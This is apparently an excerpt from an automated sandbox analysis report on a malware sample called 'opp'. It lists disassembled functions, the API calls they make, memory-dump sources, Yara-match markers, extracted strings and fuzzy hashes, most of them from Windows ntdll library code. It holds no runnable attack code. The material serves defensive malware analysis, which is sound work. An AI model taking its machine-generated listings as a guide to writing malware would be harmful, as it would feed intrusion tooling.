                                                              • Opcode Fuzzy Hash: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
                                                              • Instruction Fuzzy Hash: DBE08C723402187BC620EA5ADC42F9BB7ADDFC5B14F01405AFA08A7281D6B0B9108BF4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
                                                              • Instruction ID: 7717d4a7af475cfb367eba90537a68cc4a00c137075e44ac92c6ad4b089dc974
                                                              • Opcode Fuzzy Hash: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
                                                              • Instruction Fuzzy Hash: 49900261203400034105755C4818617404E97E0201B55C121E5014A90EC52589916225
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7cea0886b692f664765ac71469c9d8494c71fabb930bb38183d12fa6bad13526
                                                              • Instruction ID: 6ed4820aada1423bbf4f4f60d513ca7212ab44ff512a5394069aea06052cb639
                                                              • Opcode Fuzzy Hash: 7cea0886b692f664765ac71469c9d8494c71fabb930bb38183d12fa6bad13526
                                                              • Instruction Fuzzy Hash: 0D90023120240413D111755C4908707004D97D0241F95C512A4424A58ED6568A52A221
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: ed9efaa1c8d3ac3407ac468c2208da610f02fb1f1333d04e92eb47bb83164ff9
                                                              • Instruction ID: 288f8675e09a690ddc82b374e771f448b7ced65557117f7ad838067794e8dc42
                                                              • Opcode Fuzzy Hash: ed9efaa1c8d3ac3407ac468c2208da610f02fb1f1333d04e92eb47bb83164ff9
                                                              • Instruction Fuzzy Hash: 0290023120248802D110755C880874B004997D0301F59C511A8424B58EC69589917221
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6c43f64ee2cb80540d37f59dc510ecfb205e1d162f12ce7948337010f5abd823
                                                              • Instruction ID: c0b37a149e9c0b9247451601b2fb4c6281ec8de63b7ad062405388ed698ba3bb
                                                              • Opcode Fuzzy Hash: 6c43f64ee2cb80540d37f59dc510ecfb205e1d162f12ce7948337010f5abd823
                                                              • Instruction Fuzzy Hash: 9590023160650402D100755C4918707104997D0201F65C511A4424A68EC7958A5166A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041538D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(13d6pS3,00000111,00000000,00000000), ref: 0041540A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 'oN$13d6pS3$13d6pS3
                                                              • API String ID: 1836367815-4202519509
                                                              • Opcode ID: abe8662b7715577a4b67e00549239f0ae9c7219e6112b4b4964fce852ca0655b
                                                              • Instruction ID: fe34e254e3c78a2d2e75bf211c42e0671cebaf8842b7d31fa9d3e155b3f4b5cb
                                                              • Opcode Fuzzy Hash: abe8662b7715577a4b67e00549239f0ae9c7219e6112b4b4964fce852ca0655b
                                                              • Instruction Fuzzy Hash: E4012BB1E0011CBADB11BAE19C81DEFBB7CDF81398F408029FA14B7140E6785F058BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00415393 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(13d6pS3,00000111,00000000,00000000), ref: 0041540A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 13d6pS3$13d6pS3
                                                              • API String ID: 1836367815-3378015834
                                                              • Opcode ID: 2a18f07d3b58b25007c1776e027721ed4c3c70ecef04641e0f5be156848a558b
                                                              • Instruction ID: 3a74e114496ce0711f9fc21398a0d08397c93f4088640f40c2c0ae561a51f52a
                                                              • Opcode Fuzzy Hash: 2a18f07d3b58b25007c1776e027721ed4c3c70ecef04641e0f5be156848a558b
                                                              • Instruction Fuzzy Hash: 45012BB1E0011CBADB01BAE19C81DEF7B7CDF81398F408029FA1477140D6785F058BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0042C1F3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041F3AB,?,?,00000000,?,0041F3AB,?,?,?), ref: 0042C22E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
                                                              • Instruction ID: d3d283629ae7dbb578c3361da26e2255cf3ead57a8e0f8df25f3f891fe741430
                                                              • Opcode Fuzzy Hash: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
                                                              • Instruction Fuzzy Hash: 48E09AB1300204BFDA10EE99EC41E9B77ADEFC9710F00001AFD08A7282CA70BD108BB9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0042C243 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FC5D89F8,00000007,00000000,00000004,00000000,004185EF,000000F0,?,?,?,?,?), ref: 0042C27E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
                                                              • Instruction ID: c9dcfcbd2332931f1569d3fe54102bcbb547f49f7c4da694ae441fffeaf01cfd
                                                              • Opcode Fuzzy Hash: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
                                                              • Instruction Fuzzy Hash: 40E092753442047BC610EE5ADC42F9B73ADEFC5710F000419FD08A7241C670B9208BB8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0042C293 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,?,?,39D1C69F,?,?,39D1C69F), ref: 0042C2CA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: 350054d7e724a5522385e81d2f9e3944af108638e355487cb8015eeb31deba3a
                                                              • Instruction ID: 632e54142e25fb71edcd38b63f987ef404ae7833aca244d52deb45822a5d22ed
                                                              • Opcode Fuzzy Hash: 350054d7e724a5522385e81d2f9e3944af108638e355487cb8015eeb31deba3a
                                                              • Instruction Fuzzy Hash: 5CE04F752402147BC520EA5ADC41F9B775DDFC5714F004019FA0867142CAB479158BE5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7c0f213039a104e1e1568c6bc154d4a5b1874e273e67ef28718456ebb893e816
                                                              • Instruction ID: ba76f9ab6ac0d39e23c2995f7bb9df5ffb78c63a8cf16095b39b44ae380ab899
                                                              • Opcode Fuzzy Hash: 7c0f213039a104e1e1568c6bc154d4a5b1874e273e67ef28718456ebb893e816
                                                              • Instruction Fuzzy Hash: 99B09B71D025C5C5DA52E7644E0C717794477D0701F15C165D2030751F4738C5D1E275
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 01712349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 29dc488e04adfd4febe926a518d43ba1d4bf61e866ff7755385c1165d9325dca
                                                              • Instruction ID: aa9889d8c47b22913551357996b02baba02d8abd9f37ec9efc71c4392e746fcb
                                                              • Opcode Fuzzy Hash: 29dc488e04adfd4febe926a518d43ba1d4bf61e866ff7755385c1165d9325dca
                                                              • Instruction Fuzzy Hash: 2F929B71608342AFE721DE28CC80B6BF7E9BB84710F24492DFA95D7256D770E844CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016868B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-3089669407
                                                              • Opcode ID: 1862db0fbeb0d6fd693c784f91d942aab6701ccb04edd54a1af39474116b1514
                                                              • Instruction ID: fa5bec209a16806c54068cbf04f28bd474422b8337b677761fcde9a1f0d34470
                                                              • Opcode Fuzzy Hash: 1862db0fbeb0d6fd693c784f91d942aab6701ccb04edd54a1af39474116b1514
                                                              • Instruction Fuzzy Hash: E2810EB2D42219AF8B11FAE4DDD4EEF77FEAB14624B548526FA01F7110E720DD058BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016C8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Thread identifier, xrefs: 0170553A
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01705543
                                                              • Invalid debug info address of this critical section, xrefs: 017054B6
                                                              • Critical section address, xrefs: 01705425, 017054BC, 01705534
                                                              • undeleted critical section in freed memory, xrefs: 0170542B
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017054CE
                                                              • double initialized or corrupted critical section, xrefs: 01705508
                                                              • corrupted critical section, xrefs: 017054C2
                                                              • Critical section address., xrefs: 01705502
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0170540A, 01705496, 01705519
                                                              • Critical section debug info address, xrefs: 0170541F, 0170552E
                                                              • Address of the debug info found in the active list., xrefs: 017054AE, 017054FA
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017054E2
                                                              • 8, xrefs: 017052E3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: b31ab8f63b26d643c6124f2a0c2874f66fc0acc0090af59d5cbff90f7a60c9cc
                                                              • Instruction ID: 007e2caeb1fb2ac7ae096a38f4a2b632a55811a96d51ece2d99ee9bc9a9c36f3
                                                              • Opcode Fuzzy Hash: b31ab8f63b26d643c6124f2a0c2874f66fc0acc0090af59d5cbff90f7a60c9cc
                                                              • Instruction Fuzzy Hash: 70815AB1A41358EEEB21CF99CC45BAEFBF9EB09B14F204159F505B7280D3B5A941CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016C29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01702602
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0170261F
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017022E4
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017024C0
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01702506
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01702498
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01702624
                                                              • @, xrefs: 0170259B
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01702409
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01702412
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017025EB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              • Opcode ID: 02502ce8fe6ff046d272693c2a5eaca81f80aeb5fe959854ba9db0b0c8040b87
                                                              • Instruction ID: 8674e35bab41e631af36498c8ee708baf9dc0525304411c6c34e7639bc96057c
                                                              • Opcode Fuzzy Hash: 02502ce8fe6ff046d272693c2a5eaca81f80aeb5fe959854ba9db0b0c8040b87
                                                              • Instruction Fuzzy Hash: FD0262B2D002299BDB71DB54CC94BE9F7B8AB54704F0141EEEA09A7242DB709E84CF59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016C0F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                              • API String ID: 0-360209818
                                                              • Opcode ID: 8e375e77086c3e903a6ff0abc07d2c41870390460cd5a0d9a1de02b93d6c86d6
                                                              • Instruction ID: 1d2d0c9ac23edf8ee5a599f8a6d52c4903bdcece427b9f94a28aa3f9fb2d0baa
                                                              • Opcode Fuzzy Hash: 8e375e77086c3e903a6ff0abc07d2c41870390460cd5a0d9a1de02b93d6c86d6
                                                              • Instruction Fuzzy Hash: 5A628EB5A00229CFDB25CF18CC407A9B7F6EF95720F9582DAD549AB280D7729AD1CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004012B0 Relevance: 12.7, Strings: 10, Instructions: 208COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "z@`$V|:$gfff$gfff$hb$yxxx$%hb$%hb$sHM$sHM
                                                              • API String ID: 0-3445852860
                                                              • Opcode ID: a1f42d6f0fa7e2f8d22af7d9be50d504d0dc1c907d82280eba6f36b91756aa7a
                                                              • Instruction ID: b35dc9828a5765f1f19660dd3f9893d5ca201e5375bbfe01502b23bcc1e89b12
                                                              • Opcode Fuzzy Hash: a1f42d6f0fa7e2f8d22af7d9be50d504d0dc1c907d82280eba6f36b91756aa7a
                                                              • Instruction Fuzzy Hash: AB719271E1020A87DF188E99DC505EDB771EFE4344F28922BE815BF7A0E7799A418B84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01738B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              • Opcode ID: 6903002841003fd40cb4af7369295939b917625b38bae8b6f997dc918afde3d1
                                                              • Instruction ID: bd25d48b0f0e20ea763259efc8c3d0219ea275232a53d57d15f78ca3c162e7fd
                                                              • Opcode Fuzzy Hash: 6903002841003fd40cb4af7369295939b917625b38bae8b6f997dc918afde3d1
                                                              • Instruction Fuzzy Hash: B951AE715143019BD325CF288C48BABBBECEFD8654F144A6DB99983242E770D644CB93
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017412ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                              • API String ID: 0-3591852110
                                                              • Opcode ID: 3eb7421a2a4391e3b04e977b978b273fcb91c912c783c7247ea77dfc54d0a192
                                                              • Instruction ID: 3f85b08f6973d4e20e183f90b12f00f1736022e5c789f119bb3bda77e930ef40
                                                              • Opcode Fuzzy Hash: 3eb7421a2a4391e3b04e977b978b273fcb91c912c783c7247ea77dfc54d0a192
                                                              • Instruction Fuzzy Hash: 38128C30600642DFEB26EF29C445BB6FBF6EF09714F588499E4968B652D734F880CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016AAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-3197712848
                                                              • Opcode ID: f15b766d3738b83f919346fa093e81b1543078996087b1fe510638ba495b9437
                                                              • Instruction ID: 768b4958bb7e7b7765e83cc5e6a32f51caa0e85f6ae675db0a865a8621bd4a12
                                                              • Opcode Fuzzy Hash: f15b766d3738b83f919346fa093e81b1543078996087b1fe510638ba495b9437
                                                              • Instruction Fuzzy Hash: A912DF716083428BD325DB68CC80BAAB7E9FF84714F84495EFA858B391E734DD45CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0168D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                              • API String ID: 0-3532704233
                                                              • Opcode ID: 20308ffd6229b1c5bc7d0c31f4cad2f1980d0bc795dda6032fc28e9fbaff47dc
                                                              • Instruction ID: 3ab237fd81fab3ecb358fe0763f138e96e9d74d40a47b59feff82cad5ab3e7dc
                                                              • Opcode Fuzzy Hash: 20308ffd6229b1c5bc7d0c31f4cad2f1980d0bc795dda6032fc28e9fbaff47dc
                                                              • Instruction Fuzzy Hash: 26B1BF715093169FD711EFA8CC80A6BBBE8AF84744F014A2EF989D7380D770D945CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01740CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                              • API String ID: 0-1357697941
                                                              • Opcode ID: fc103cab374827540e8f8b3a1a7539130c79ffa04d6eeb609ec97bffc05aa4fd
                                                              • Instruction ID: 56ac17d42726ea1c6b1f86e90addf746ae3db0e353f85996b2e89b374314159a
                                                              • Opcode Fuzzy Hash: fc103cab374827540e8f8b3a1a7539130c79ffa04d6eeb609ec97bffc05aa4fd
                                                              • Instruction Fuzzy Hash: 7FF1E131A00656EFDB25EF68C440BEAFBF5FF09714F48809DE68297252C774A985CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01740274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: b6ab4884e6111d501aa1931de26579d9e06d1abdf0481de2daf73610ce4b206f
                                                              • Instruction ID: c94804ea10fc84dbda0dc1b9f1451bb8b918d104a48dce887f55891e86f6fc0d
                                                              • Opcode Fuzzy Hash: b6ab4884e6111d501aa1931de26579d9e06d1abdf0481de2daf73610ce4b206f
                                                              • Instruction Fuzzy Hash: ECD1CE31600686DFDB22EF68C841AEDFBF2FF4A720F188149F6469B252C7749941CB55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

